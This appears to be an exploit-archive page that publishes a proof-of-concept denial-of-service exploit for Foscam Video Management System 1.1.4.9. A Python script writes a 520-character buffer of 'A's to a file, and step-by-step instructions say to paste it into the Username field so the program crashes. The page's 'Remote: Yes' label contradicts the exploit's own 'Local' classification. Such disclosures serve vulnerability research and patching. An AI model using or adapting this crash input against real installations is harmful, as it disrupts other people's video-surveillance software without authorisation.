Foscam Video Management System 1.1.4.9 Username Denial of Service (PoC)

2019.11.28

Credit: chuyreds

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
# Author: chuyreds
# Discovery Date: 2019-11-16
# Vendor Homepage: https://www.foscam.es/
# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
# Tested Version: 1.1.4.9
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python foscam-vms-uid-dos.py
# 2.- Open FoscamVMS1.1.4.9.txt and copy its content to clipboard
# 3.- Open FoscamVMS
# 4.- Go to Add Device
# 5.- Choose device type "NVR"/"IPC"
# 6.- Copy the content of the file into Username
# 7.- Click on Login Check
# 8.- Crashed
buffer = "\x41" * 520
f = open ("FoscamVMS_1.1.4.9.txt", "w")
f.write(buffer)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Foscam Video Management System 1.1.4.9 Username Denial of Service (PoC)

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.